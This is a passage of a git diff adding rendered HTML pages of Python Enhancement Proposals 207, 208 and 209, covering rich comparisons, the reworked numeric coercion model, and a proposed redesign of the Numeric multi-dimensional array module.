z = x + y   # z == array((3,4,7,8))
+
+
+

they cannot be compared in the current framework - the released +version of NumPy compares the pointers, (thus yielding junk +information) which was the only solution before the recent +addition of the ability (in 1.5) to raise exceptions in comparison +functions.

+

Even with the ability to raise exceptions, the current protocol +makes array comparisons useless. To deal with this fact, NumPy +includes several functions which perform the comparisons: less(), +less_equal(), greater(), greater_equal(), equal(), +not_equal(). These functions return arrays with the same shape as +their arguments (modulo broadcasting), filled with 0’s and 1’s +depending on whether the comparison is true or not for each +element pair. Thus, for example, using the arrays x and y defined +above:

+
less(x,y)
+
+
+

would be an array containing the numbers (1,0,0,0).

+

The current proposal is to modify the Python object interface to +allow the NumPy package to make it so that x < y returns the same +thing as less(x,y). The exact return value is up to the NumPy +package – what this proposal really asks for is changing the +Python core so that extension objects have the ability to return +something other than -1, 0, 1, should their authors choose to do +so.

+
+
+

Current State of Affairs

+

The current protocol is, at the C level, that each object type +defines a tp_compare slot, which is a pointer to a function which +takes two PyObject* references and returns -1, 0, or 1. This +function is called by the PyObject_Compare() function defined in +the C API. PyObject_Compare() is also called by the builtin +function cmp() which takes two arguments.

+
+

Proposed Mechanism

+
    +
  1. Changes to the C structure for type objects

    The last available slot in the PyTypeObject, reserved up to now +for future expansion, is used to optionally store a pointer to a +new comparison function, of type richcmpfunc defined by:

    +
    typedef PyObject *(*richcmpfunc)
    +     Py_PROTO((PyObject *, PyObject *, int));
    +
    +
    +

    This function takes three arguments. The first two are the objects +to be compared, and the third is an integer corresponding to an +opcode (one of LT, LE, EQ, NE, GT, GE). If this slot is left NULL, +then rich comparison for that object type is not supported (except +for class instances whose class provide the special methods +described below).

    +

    The above opcodes need to be added to the published Python/C API +(probably under the names Py_LT, Py_LE, etc.)

    +
  2. +
  3. Additions of special methods for classes

    Classes wishing to support the rich comparison mechanisms must add +one or more of the following new special methods:

    +
    def __lt__(self, other):
    +   ...
    +def __le__(self, other):
    +   ...
    +def __gt__(self, other):
    +   ...
    +def __ge__(self, other):
    +   ...
    +def __eq__(self, other):
    +   ...
    +def __ne__(self, other):
    +   ...
    +
    +
    +

    Each of these is called when the class instance is the on the +left-hand-side of the corresponding operators (<, <=, >, >=, ==, +and != or <>). The argument other is set to the object on the +right side of the operator. The return value of these methods is +up to the class implementor (after all, that’s the entire point of +the proposal).

    +

    If the object on the left side of the operator does not define an +appropriate rich comparison operator (either at the C level or +with one of the special methods, then the comparison is reversed, +and the right hand operator is called with the opposite operator, +and the two objects are swapped. This assumes that a < b and b > a +are equivalent, as are a <= b and b >= a, and that == and != are +commutative (e.g. a == b if and only if b == a).

    +

    For example, if obj1 is an object which supports the rich +comparison protocol and x and y are objects which do not support +the rich comparison protocol, then obj1 < x will call the __lt__ +method of obj1 with x as the second argument. x < obj1 will call +obj1’s __gt__ method with x as a second argument, and x < y will +just use the existing (non-rich) comparison mechanism.

    +

    The above mechanism is such that classes can get away with not +implementing either __lt__ and __le__ or __gt__ and +__ge__. Further smarts could have been added to the comparison +mechanism, but this limited set of allowed “swaps” was chosen +because it doesn’t require the infrastructure to do any processing +(negation) of return values. The choice of six special methods was +made over a single (e.g. __richcmp__) method to allow the +dispatching on the opcode to be performed at the level of the C +implementation rather than the user-defined method.

    +
  4. +
  5. Addition of an optional argument to the builtin cmp()

    The builtin cmp() is still used for simple comparisons. For rich +comparisons, it is called with a third argument, one of “<”, “<=”, +“>”, “>=”, “==”, “!=”, “<>” (the last two have the same +meaning). When called with one of these strings as the third +argument, cmp() can return any Python object. Otherwise, it can +only return -1, 0 or 1 as before.

    +
  6. +
+
+
+

Chained Comparisons

+
+

Problem

+

It would be nice to allow objects for which the comparison returns +something other than -1, 0, or 1 to be used in chained +comparisons, such as:

+
x < y < z
+
+
+

Currently, this is interpreted by Python as:

+
temp1 = x < y
+if temp1:
+  return y < z
+else:
+  return temp1
+
+
+

Note that this requires testing the truth value of the result of +comparisons, with potential “shortcutting” of the right-side +comparison testings. In other words, the truth-value of the result +of the result of the comparison determines the result of a chained +operation. This is problematic in the case of arrays, since if x, +y and z are three arrays, then the user expects:

+
x < y < z
+
+
+

to be an array of 0’s and 1’s where 1’s are in the locations +corresponding to the elements of y which are between the +corresponding elements in x and z. In other words, the right-hand +side must be evaluated regardless of the result of x < y, which is +incompatible with the mechanism currently in use by the parser.

+
+
+

Solution

+

Guido mentioned that one possible way out would be to change the +code generated by chained comparisons to allow arrays to be +chained-compared intelligently. What follows is a mixture of his +idea and my suggestions. The code generated for x < y < z would be +equivalent to:

+
temp1 = x < y
+if temp1:
+  temp2 = y < z
+  return boolean_combine(temp1, temp2)
+else:
+  return temp1
+
+
+

where boolean_combine is a new function which does something like +the following:

+
def boolean_combine(a, b):
+    if hasattr(a, '__boolean_and__') or \
+       hasattr(b, '__boolean_and__'):
+        try:
+            return a.__boolean_and__(b)
+        except:
+            return b.__boolean_and__(a)
+    else: # standard behavior
+        if a:
+            return b
+        else:
+            return 0
+
+
+

where the __boolean_and__ special method is implemented for +C-level types by another value of the third argument to the +richcmp function. This method would perform a boolean comparison +of the arrays (currently implemented in the umath module as the +logical_and ufunc).

+

Thus, objects returned by rich comparisons should always test +true, but should define another special method which creates +boolean combinations of them and their argument.

+

This solution has the advantage of allowing chained comparisons to +work for arrays, but the disadvantage that it requires comparison +arrays to always return true (in an ideal world, I’d have them +always raise an exception on truth testing, since the meaning of +testing “if a>b:” is massively ambiguous.

+

The inlining already present which deals with integer comparisons +would still apply, resulting in no performance cost for the most +common cases.

+
+
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0207.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0208/index.html b/pep-0208/index.html new file mode 100644 index 00000000000..40da28af6c3 --- /dev/null +++ b/pep-0208/index.html @@ -0,0 +1,386 @@ + + + + + + + + PEP 208 – Reworking the Coercion Model | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 208 – Reworking the Coercion Model

+
+
Author:
+
Neil Schemenauer <nas at arctrix.com>, Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-Dec-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Many Python types implement numeric operations. When the arguments of +a numeric operation are of different types, the interpreter tries to +coerce the arguments into a common type. The numeric operation is +then performed using this common type. This PEP proposes a new type +flag to indicate that arguments to a type’s numeric operations should +not be coerced. Operations that do not support the supplied types +indicate it by returning a new singleton object. Types which do not +set the type flag are handled in a backwards compatible manner. +Allowing operations handle different types is often simpler, more +flexible, and faster than having the interpreter do coercion.

+
+
+

Rationale

+

When implementing numeric or other related operations, it is often +desirable to provide not only operations between operands of one type +only, e.g. integer + integer, but to generalize the idea behind the +operation to other type combinations as well, e.g. integer + float.

+

A common approach to this mixed type situation is to provide a method +of “lifting” the operands to a common type (coercion) and then use +that type’s operand method as execution mechanism. Yet, this strategy +has a few drawbacks:

+
    +
  • the “lifting” process creates at least one new (temporary) +operand object,
  • +
  • since the coercion method is not being told about the operation +that is to follow, it is not possible to implement operation +specific coercion of types,
  • +
  • there is no elegant way to solve situations were a common type +is not at hand, and
  • +
  • the coercion method will always have to be called prior to the +operation’s method itself.
  • +
+

A fix for this situation is obviously needed, since these drawbacks +make implementations of types needing these features very cumbersome, +if not impossible. As an example, have a look at the DateTime and +DateTimeDelta [1] types, the first being absolute, the second +relative. You can always add a relative value to an absolute one, +giving a new absolute value. Yet, there is no common type which the +existing coercion mechanism could use to implement that operation.

+

Currently, PyInstance types are treated specially by the interpreter +in that their numeric methods are passed arguments of different types. +Removing this special case simplifies the interpreter and allows other +types to implement numeric methods that behave like instance types. +This is especially useful for extension types like ExtensionClass.

+
+
+

Specification

+

Instead of using a central coercion method, the process of handling +different operand types is simply left to the operation. If the +operation finds that it cannot handle the given operand type +combination, it may return a special singleton as indicator.

+

Note that “numbers” (anything that implements the number protocol, or +part of it) written in Python already use the first part of this +strategy - it is the C level API that we focus on here.

+

To maintain nearly 100% backward compatibility we have to be very +careful to make numbers that don’t know anything about the new +strategy (old style numbers) work just as well as those that expect +the new scheme (new style numbers). Furthermore, binary compatibility +is a must, meaning that the interpreter may only access and use new +style operations if the number indicates the availability of these.

+

A new style number is considered by the interpreter as such if and +only if it sets the type flag Py_TPFLAGS_CHECKTYPES. The main +difference between an old style number and a new style one is that the +numeric slot functions can no longer assume to be passed arguments of +identical type. New style slots must check all arguments for proper +type and implement the necessary conversions themselves. This may seem +to cause more work on the behalf of the type implementor, but is in +fact no more difficult than writing the same kind of routines for an +old style coercion slot.

+

If a new style slot finds that it cannot handle the passed argument +type combination, it may return a new reference of the special +singleton Py_NotImplemented to the caller. This will cause the caller +to try the other operands operation slots until it finds a slot that +does implement the operation for the specific type combination. If +none of the possible slots succeed, it raises a TypeError.

+

To make the implementation easy to understand (the whole topic is +esoteric enough), a new layer in the handling of numeric operations is +introduced. This layer takes care of all the different cases that need +to be taken into account when dealing with all the possible +combinations of old and new style numbers. It is implemented by the +two static functions binary_op() and ternary_op(), which are both +internal functions that only the functions in Objects/abstract.c +have access to. The numeric API (PyNumber_*) is easy to adapt to +this new layer.

+

As a side-effect all numeric slots can be NULL-checked (this has to be +done anyway, so the added feature comes at no extra cost).

+

The scheme used by the layer to execute a binary operation is as +follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
vwAction taken
newnewv.op(v,w), w.op(v,w)
newoldv.op(v,w), coerce(v,w), v.op(v,w)
oldneww.op(v,w), coerce(v,w), v.op(v,w)
oldoldcoerce(v,w), v.op(v,w)
+

The indicated action sequence is executed from left to right until +either the operation succeeds and a valid result (!= +Py_NotImplemented) is returned or an exception is raised. Exceptions +are returned to the calling function as-is. If a slot returns +Py_NotImplemented, the next item in the sequence is executed.

+

Note that coerce(v,w) will use the old style nb_coerce slot methods +via a call to PyNumber_Coerce().

+

Ternary operations have a few more cases to handle:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
vwzAction taken
newnewnewv.op(v,w,z), w.op(v,w,z), z.op(v,w,z)
newoldnewv.op(v,w,z), z.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
oldnewneww.op(v,w,z), z.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
oldoldnewz.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
newnewoldv.op(v,w,z), w.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
newoldoldv.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
oldnewoldw.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
oldoldoldcoerce(v,w,z), v.op(v,w,z)
+

The same notes as above, except that coerce(v,w,z) actually does:

+
if z != Py_None:
+    coerce(v,w), coerce(v,z), coerce(w,z)
+else:
+    # treat z as absent variable
+    coerce(v,w)
+
+
+

The current implementation uses this scheme already (there’s only one +ternary slot: nb_pow(a,b,c)).

+

Note that the numeric protocol is also used for some other related +tasks, e.g. sequence concatenation. These can also benefit from the +new mechanism by implementing right-hand operations for type +combinations that would otherwise fail to work. As an example, take +string concatenation: currently you can only do string + string. With +the new mechanism, a new string-like type could implement new_type + +string and string + new_type, even though strings don’t know anything +about new_type.

+

Since comparisons also rely on coercion (every time you compare an +integer to a float, the integer is first converted to float and then +compared…), a new slot to handle numeric comparisons is needed:

+
PyObject *nb_cmp(PyObject *v, PyObject *w)
+
+
+

This slot should compare the two objects and return an integer object +stating the result. Currently, this result integer may only be -1, 0, 1. +If the slot cannot handle the type combination, it may return a +reference to Py_NotImplemented. [XXX Note that this slot is still +in flux since it should take into account rich comparisons +(i.e. PEP 207).]

+

Numeric comparisons are handled by a new numeric protocol API:

+
PyObject *PyNumber_Compare(PyObject *v, PyObject *w)
+
+
+

This function compare the two objects as “numbers” and return an +integer object stating the result. Currently, this result integer may +only be -1, 0, 1. In case the operation cannot be handled by the given +objects, a TypeError is raised.

+

The PyObject_Compare() API needs to adjusted accordingly to make use +of this new API.

+

Other changes include adapting some of the built-in functions (e.g. +cmp()) to use this API as well. Also, PyNumber_CoerceEx() will need to +check for new style numbers before calling the nb_coerce slot. New +style numbers don’t provide a coercion slot and thus cannot be +explicitly coerced.

+
+
+

Reference Implementation

+

A preliminary patch for the CVS version of Python is available through +the Source Forge patch manager [2].

+
+
+

Credits

+

This PEP and the patch are heavily based on work done by Marc-André +Lemburg [3].

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0208.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0209/index.html b/pep-0209/index.html new file mode 100644 index 00000000000..f5edd1f8d18 --- /dev/null +++ b/pep-0209/index.html @@ -0,0 +1,746 @@ + + + + + + + + PEP 209 – Multi-dimensional Arrays | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 209 – Multi-dimensional Arrays

+
+
Author:
+
Paul Barrett <barrett at stsci.edu>, Travis Oliphant <oliphant at ee.byu.edu>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
03-Jan-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+

×

+

+
+
+

Abstract

+

This PEP proposes a redesign and re-implementation of the +multi-dimensional array module, Numeric, to make it easier to add +new features and functionality to the module. Aspects of Numeric 2 +that will receive special attention are efficient access to arrays +exceeding a gigabyte in size and composed of inhomogeneous data +structures or records. The proposed design uses four Python +classes: ArrayType, UFunc, Array, and ArrayView; and a low-level +C-extension module, _ufunc, to handle the array operations +efficiently. In addition, each array type has its own C-extension +module which defines the coercion rules, operations, and methods +for that type. This design enables new types, features, and +functionality to be added in a modular fashion. The new version +will introduce some incompatibilities with the current Numeric.

+
+
+

Motivation

+

Multi-dimensional arrays are commonly used to store and manipulate +data in science, engineering, and computing. Python currently has +an extension module, named Numeric (henceforth called Numeric 1), +which provides a satisfactory set of functionality for users +manipulating homogeneous arrays of data of moderate size (of order +10 MB). For access to larger arrays (of order 100 MB or more) of +possibly inhomogeneous data, the implementation of Numeric 1 is +inefficient and cumbersome. In the future, requests by the +Numerical Python community for additional functionality is also +likely as PEPs 211: Adding New Linear Operators to Python, and +225: Elementwise/Objectwise Operators illustrate.

+
+
+

Proposal

+

This proposal recommends a re-design and re-implementation of +Numeric 1, henceforth called Numeric 2, which will enable new +types, features, and functionality to be added in an easy and +modular manner. The initial design of Numeric 2 should focus on +providing a generic framework for manipulating arrays of various +types and should enable a straightforward mechanism for adding new +array types and UFuncs. Functional methods that are more specific +to various disciplines can then be layered on top of this core. +This new module will still be called Numeric and most of the +behavior found in Numeric 1 will be preserved.

+

The proposed design uses four Python classes: ArrayType, UFunc, +Array, and ArrayView; and a low-level C-extension module to handle +the array operations efficiently. In addition, each array type +has its own C-extension module which defines the coercion rules, +operations, and methods for that type. At a later date, when core +functionality is stable, some Python classes can be converted to +C-extension types.

+

Some planned features are:

+
    +
  1. Improved memory usage

    This feature is particularly important when handling large arrays +and can produce significant improvements in performance as well as +memory usage. We have identified several areas where memory usage +can be improved:

    +
      +
    1. Use a local coercion model

      Instead of using Python’s global coercion model which creates +temporary arrays, Numeric 2, like Numeric 1, will implement a +local coercion model as described in PEP 208 which defers the +responsibility of coercion to the operator. By using internal +buffers, a coercion operation can be done for each array +(including output arrays), if necessary, at the time of the +operation. Benchmarks [1] have shown that performance is at +most degraded only slightly and is improved in cases where the +internal buffers are less than the L2 cache size and the +processor is under load. To avoid array coercion altogether, +C functions having arguments of mixed type are allowed in +Numeric 2.

      +
    2. +
    3. Avoid creation of temporary arrays

      In complex array expressions (i.e. having more than one +operation), each operation will create a temporary array which +will be used and then deleted by the succeeding operation. A +better approach would be to identify these temporary arrays +and reuse their data buffers when possible, namely when the +array shape and type are the same as the temporary array being +created. This can be done by checking the temporary array’s +reference count. If it is 1, then it will be deleted once the +operation is done and is a candidate for reuse.

      +
    4. +
    5. Optional use of memory-mapped files

      Numeric users sometimes need to access data from very large +files or to handle data that is greater than the available +memory. Memory-mapped arrays provide a mechanism to do this +by storing the data on disk while making it appear to be in +memory. Memory- mapped arrays should improve access to all +files by eliminating one of two copy steps during a file +access. Numeric should be able to access in-memory and +memory-mapped arrays transparently.

      +
    6. +
    7. Record access

      In some fields of science, data is stored in files as binary +records. For example, in astronomy, photon data is stored as a +1 dimensional list of photons in order of arrival time. These +records or C-like structures contain information about the +detected photon, such as its arrival time, its position on the +detector, and its energy. Each field may be of a different +type, such as char, int, or float. Such arrays introduce new +issues that must be dealt with, in particular byte alignment +or byte swapping may need to be performed for the numeric +values to be properly accessed (though byte swapping is also +an issue for memory mapped data). Numeric 2 is designed to +automatically handle alignment and representational issues +when data is accessed or operated on. There are two +approaches to implementing records; as either a derived array +class or a special array type, depending on your point-of-view. +We defer this discussion to the Open Issues section.

      +
    8. +
    +
  2. +
  3. Additional array types

    Numeric 1 has 11 defined types: char, ubyte, sbyte, short, int, +long, float, double, cfloat, cdouble, and object. There are no +ushort, uint, or ulong types, nor are there more complex types +such as a bit type which is of use to some fields of science and +possibly for implementing masked-arrays. The design of Numeric 1 +makes the addition of these and other types a difficult and +error-prone process. To enable the easy addition (and deletion) +of new array types such as a bit type described below, a re-design +of Numeric is necessary.

    +
      +
    1. Bit type

      The result of a rich comparison between arrays is an array of +boolean values. The result can be stored in an array of type +char, but this is an unnecessary waste of memory. A better +implementation would use a bit or boolean type, compressing +the array size by a factor of eight. This is currently being +implemented for Numeric 1 (by Travis Oliphant) and should be +included in Numeric 2.

      +
    2. +
    +
  4. +
  5. Enhanced array indexing syntax

    The extended slicing syntax was added to Python to provide greater +flexibility when manipulating Numeric arrays by allowing +step-sizes greater than 1. This syntax works well as a shorthand +for a list of regularly spaced indices. For those situations +where a list of irregularly spaced indices are needed, an enhanced +array indexing syntax would allow 1-D arrays to be arguments.

    +
  6. +
  7. Rich comparisons

    The implementation of PEP 207: Rich Comparisons in Python 2.1 +provides additional flexibility when manipulating arrays. We +intend to implement this feature in Numeric 2.

    +
  8. +
  9. Array broadcasting rules

    When an operation between a scalar and an array is done, the +implied behavior is to create a new array having the same shape as +the array operand containing the scalar value. This is called +array broadcasting. It also works with arrays of lesser rank, +such as vectors. This implicit behavior is implemented in Numeric +1 and will also be implemented in Numeric 2.

    +
  10. +
+
+
+

Design and Implementation

+

The design of Numeric 2 has four primary classes:

+
    +
  1. ArrayType:

    This is a simple class that describes the fundamental properties +of an array-type, e.g. its name, its size in bytes, its coercion +relations with respect to other types, etc., e.g.

    +
    Int32 = ArrayType('Int32', 4, 'doc-string')
    +
    +
    +

    Its relation to the other types is defined when the C-extension +module for that type is imported. The corresponding Python code +is:

    +
    Int32.astype[Real64] = Real64
    +
    +
    +

    This says that the Real64 array-type has higher priority than the +Int32 array-type.

    +

    The following attributes and methods are proposed for the core +implementation. Additional attributes can be added on an +individual basis, e.g. .bitsize or .bitstrides for the bit type.

    +

    Attributes:

    +
    .name:                  e.g. "Int32", "Float64", etc.
    +.typecode:              e.g. 'i', 'f', etc.
    +                        (for backward compatibility)
    +.size (in bytes):       e.g. 4, 8, etc.
    +.array_rules (mapping): rules between array types
    +.pyobj_rules (mapping): rules between array and python types
    +.doc:                   documentation string
    +
    +
    +

    Methods:

    +
    __init__():             initialization
    +__del__():              destruction
    +__repr__():             representation
    +
    +
    +

    C-API: This still needs to be fleshed-out.

    +
  2. +
  3. UFunc:

    This class is the heart of Numeric 2. Its design is similar to +that of ArrayType in that the UFunc creates a singleton callable +object whose attributes are name, total and input number of +arguments, a document string, and an empty CFunc dictionary; e.g.

    +
    add = UFunc('add', 3, 2, 'doc-string')
    +
    +
    +

    When defined the add instance has no C functions associated with +it and therefore can do no work. The CFunc dictionary is +populated or registered later when the C-extension module for an +array-type is imported. The arguments of the register method are: +function name, function descriptor, and the CUFunc object. The +corresponding Python code is

    +
    add.register('add', (Int32, Int32, Int32), cfunc-add)
    +
    +
    +

    In the initialization function of an array type module, e.g. +Int32, there are two C API functions: one to initialize the +coercion rules and the other to register the CFunc objects.

    +

    When an operation is applied to some arrays, the __call__ method +is invoked. It gets the type of each array (if the output array +is not given, it is created from the coercion rules) and checks +the CFunc dictionary for a key that matches the argument types. +If it exists the operation is performed immediately, otherwise the +coercion rules are used to search for a related operation and set +of conversion functions. The __call__ method then invokes a +compute method written in C to iterate over slices of each array, +namely:

    +
    _ufunc.compute(slice, data, func, swap, conv)
    +
    +
    +

    The ‘func’ argument is a CFuncObject, while the ‘swap’ and ‘conv’ +arguments are lists of CFuncObjects for those arrays needing pre- or +post-processing, otherwise None is used. The data argument is +a list of buffer objects, and the slice argument gives the number +of iterations for each dimension along with the buffer offset and +step size for each array and each dimension.

    +

    We have predefined several UFuncs for use by the __call__ method: +cast, swap, getobj, and setobj. The cast and swap functions do +coercion and byte-swapping, respectively and the getobj and setobj +functions do coercion between Numeric arrays and Python sequences.

    +

    The following attributes and methods are proposed for the core +implementation.

    +

    Attributes:

    +
    .name:                  e.g. "add", "subtract", etc.
    +.nargs:                 number of total arguments
    +.iargs:                 number of input arguments
    +.cfuncs (mapping):      the set C functions
    +.doc:                   documentation string
    +
    +
    +

    Methods:

    +
    __init__():             initialization
    +__del__():              destruction
    +__repr__():             representation
    +__call__():             look-up and dispatch method
    +initrule():             initialize coercion rule
    +uninitrule():           uninitialize coercion rule
    +register():             register a CUFunc
    +unregister():           unregister a CUFunc
    +
    +
    +

    C-API: This still needs to be fleshed-out.

    +
  4. +
  5. Array:

    This class contains information about the array, such as shape, +type, endian-ness of the data, etc.. Its operators, ‘+’, ‘-‘, +etc. just invoke the corresponding UFunc function, e.g.

    +
    def __add__(self, other):
    +    return ufunc.add(self, other)
    +
    +
    +

    The following attributes, methods, and functions are proposed for +the core implementation.

    +

    Attributes:

    +
    .shape:                 shape of the array
    +.format:                type of the array
    +.real (only complex):   real part of a complex array
    +.imag (only complex):   imaginary part of a complex array
    +
    +
    +

    Methods:

    +
    __init__():             initialization
    +__del__():              destruction
    +__repr_():              representation
    +__str__():              pretty representation
    +__cmp__():              rich comparison
    +__len__():
    +__getitem__():
    +__setitem__():
    +__getslice__():
    +__setslice__():
    +numeric methods:
    +copy():                 copy of array
    +aslist():               create list from array
    +asstring():             create string from array
    +
    +
    +

    Functions:

    +
    fromlist():             create array from sequence
    +fromstring():           create array from string
    +array():                create array with shape and value
    +concat():               concatenate two arrays
    +resize():               resize array
    +
    +
    +

    C-API: This still needs to be fleshed-out.

    +
  6. +
  7. ArrayView

    This class is similar to the Array class except that the reshape +and flat methods will raise exceptions, since non-contiguous +arrays cannot be reshaped or flattened using just pointer and +step-size information.

    +

    C-API: This still needs to be fleshed-out.

    +
  8. +
  9. C-extension modules:

    Numeric2 will have several C-extension modules.

    +
      +
    1. _ufunc:

      The primary module of this set is the _ufuncmodule.c. The +intention of this module is to do the bare minimum, +i.e. iterate over arrays using a specified C function. The +interface of these functions is the same as Numeric 1, i.e.

      +
      int (*CFunc)(char *data, int *steps, int repeat, void *func);
      +
      +
      +

      and their functionality is expected to be the same, i.e. they +iterate over the inner-most dimension.

      +

      The following attributes and methods are proposed for the core +implementation.

      +

      Attributes:

      +

      Methods:

      +
      compute():
      +
      +
      +

      C-API: This still needs to be fleshed-out.

      +
    2. +
    3. _int32, _real64, etc.:

      There will also be C-extension modules for each array type, +e.g. _int32module.c, _real64module.c, etc. As mentioned +previously, when these modules are imported by the UFunc +module, they will automatically register their functions and +coercion rules. New or improved versions of these modules can +be easily implemented and used without affecting the rest of +Numeric 2.

      +
    4. +
    +
  10. +
+
+
+

Open Issues

+
    +
  1. Does slicing syntax default to copy or view behavior?

    The default behavior of Python is to return a copy of a sub-list +or tuple when slicing syntax is used, whereas Numeric 1 returns a +view into the array. The choice made for Numeric 1 is apparently +for reasons of performance: the developers wish to avoid the +penalty of allocating and copying the data buffer during each +array operation and feel that the need for a deep copy of an array +to be rare. Yet, some have argued that Numeric’s slice notation +should also have copy behavior to be consistent with Python lists. +In this case the performance penalty associated with copy behavior +can be minimized by implementing copy-on-write. This scheme has +both arrays sharing one data buffer (as in view behavior) until +either array is assigned new data at which point a copy of the +data buffer is made. View behavior would then be implemented by +an ArrayView class, whose behavior be similar to Numeric 1 arrays, +i.e. .shape is not settable for non-contiguous arrays. The use of +an ArrayView class also makes explicit what type of data the array +contains.

    +
  2. +
  3. Does item syntax default to copy or view behavior?

    A similar question arises with the item syntax. For example, if +a = [[0,1,2], [3,4,5]] and b = a[0], then changing b[0] also changes +a[0][0], because a[0] is a reference or view of the first row of a. +Therefore, if c is a 2-d array, it would appear that c[i] +should return a 1-d array which is a view into, instead of a copy +of, c for consistency. Yet, c[i] can be considered just a +shorthand for c[i,:] which would imply copy behavior assuming +slicing syntax returns a copy. Should Numeric 2 behave the same +way as lists and return a view or should it return a copy.

    +
  4. +
  5. How is scalar coercion implemented?

    Python has fewer numeric types than Numeric which can cause +coercion problems. For example, when multiplying a Python scalar +of type float and a Numeric array of type float, the Numeric array +is converted to a double, since the Python float type is actually +a double. This is often not the desired behavior, since the +Numeric array will be doubled in size which is likely to be +annoying, particularly for very large arrays. We prefer that the +array type trumps the python type for the same type class, namely +integer, float, and complex. Therefore, an operation between a +Python integer and an Int16 (short) array will return an Int16 +array. Whereas an operation between a Python float and an Int16 +array would return a Float64 (double) array. Operations between +two arrays use normal coercion rules.

    +
  6. +
  7. How is integer division handled?

    In a future version of Python, the behavior of integer division +will change. The operands will be converted to floats, so the +result will be a float. If we implement the proposed scalar +coercion rules where arrays have precedence over Python scalars, +then dividing an array by an integer will return an integer array +and will not be consistent with a future version of Python which +would return an array of type double. Scientific programmers are +familiar with the distinction between integer and float-point +division, so should Numeric 2 continue with this behavior?

    +
  8. +
  9. How should records be implemented?

    There are two approaches to implementing records depending on your +point-of-view. The first is two divide arrays into separate +classes depending on the behavior of their types. For example, +numeric arrays are one class, strings a second, and records a +third, because the range and type of operations of each class +differ. As such, a record array is not a new type, but a +mechanism for a more flexible form of array. To easily access and +manipulate such complex data, the class is comprised of numeric +arrays having different byte offsets into the data buffer. For +example, one might have a table consisting of an array of Int16, +Real32 values. Two numeric arrays, one with an offset of 0 bytes +and a stride of 6 bytes to be interpreted as Int16, and one with an +offset of 2 bytes and a stride of 6 bytes to be interpreted as +Real32 would represent the record array. Both numeric arrays +would refer to the same data buffer, but have different offset and +stride attributes, and a different numeric type.

    +

    The second approach is to consider a record as one of many array +types, albeit with fewer, and possibly different, array operations +than for numeric arrays. This approach considers an array type to +be a mapping of a fixed-length string. The mapping can either be +simple, like integer and floating-point numbers, or complex, like +a complex number, a byte string, and a C-structure. The record +type effectively merges the struct and Numeric modules into a +multi-dimensional struct array. This approach implies certain +changes to the array interface. For example, the ‘typecode’ +keyword argument should probably be changed to the more +descriptive ‘format’ keyword.

    +
      +
    1. How are record semantics defined and implemented?

      Which ever implementation approach is taken for records, the +syntax and semantics of how they are to be accessed and +manipulated must be decided, if one wishes to have access to +sub-fields of records. In this case, the record type can +essentially be considered an inhomogeneous list, like a tuple +returned by the unpack method of the struct module; and a 1-d +array of records may be interpreted as a 2-d array with the +second dimension being the index into the list of fields. +This enhanced array semantics makes access to an array of one +or more of the fields easy and straightforward. It also +allows a user to do array operations on a field in a natural +and intuitive way. If we assume that records are implemented +as an array type, then last dimension defaults to 0 and can +therefore be neglected for arrays comprised of simple types, +like numeric.

      +
    2. +
    +
  10. +
  11. How are masked-arrays implemented?

    Masked-arrays in Numeric 1 are implemented as a separate array +class. With the ability to add new array types to Numeric 2, it +is possible that masked-arrays in Numeric 2 could be implemented +as a new array type instead of an array class.

    +
  12. +
  13. How are numerical errors handled (IEEE floating-point errors in +particular)?

    It is not clear to the proposers (Paul Barrett and Travis +Oliphant) what is the best or preferred way of handling errors. +Since most of the C functions that do the operation, iterate over +the inner-most (last) dimension of the array. This dimension +could contain a thousand or more items having one or more errors +of differing type, such as divide-by-zero, underflow, and +overflow. Additionally, keeping track of these errors may come at +the expense of performance. Therefore, we suggest several +options:

    +
      +
    1. Print a message of the most severe error, leaving it to +the user to locate the errors.
    2. +
    3. Print a message of all errors that occurred and the number +of occurrences, leaving it to the user to locate the errors.
    4. +
    5. Print a message of all errors that occurred and a list of +where they occurred.
    6. +
    7. Or use a hybrid approach, printing only the most severe +error, yet keeping track of what and where the errors +occurred. This would allow the user to locate the errors +while keeping the error message brief.
    8. +
    +
  14. +
  15. What features are needed to ease the integration of FORTRAN +libraries and code?
  16. +
+

It would be a good idea at this stage to consider how to ease the +integration of FORTRAN libraries and user code in Numeric 2.

+
+
+

Implementation Steps

+
    +
  1. Implement basic UFunc capability
      +
    1. Minimal Array class:

      Necessary class attributes and methods, e.g. .shape, .data, +.type, etc.

      +
    2. +
    3. Minimal ArrayType class:

      Int32, Real64, Complex64, Char, Object

      +
    4. +
    5. Minimal UFunc class:

      UFunc instantiation, CFunction registration, UFunc call for +1-D arrays including the rules for doing alignment, +byte-swapping, and coercion.

      +
    6. +
    7. Minimal C-extension module:

      _UFunc, which does the innermost array loop in C.

      +

      This step implements whatever is needed to do: ‘c = add(a, b)’ +where a, b, and c are 1-D arrays. It teaches us how to add +new UFuncs, to coerce the arrays, to pass the necessary +information to a C iterator method and to do the actually +computation.

      +
    8. +
    +
  2. +
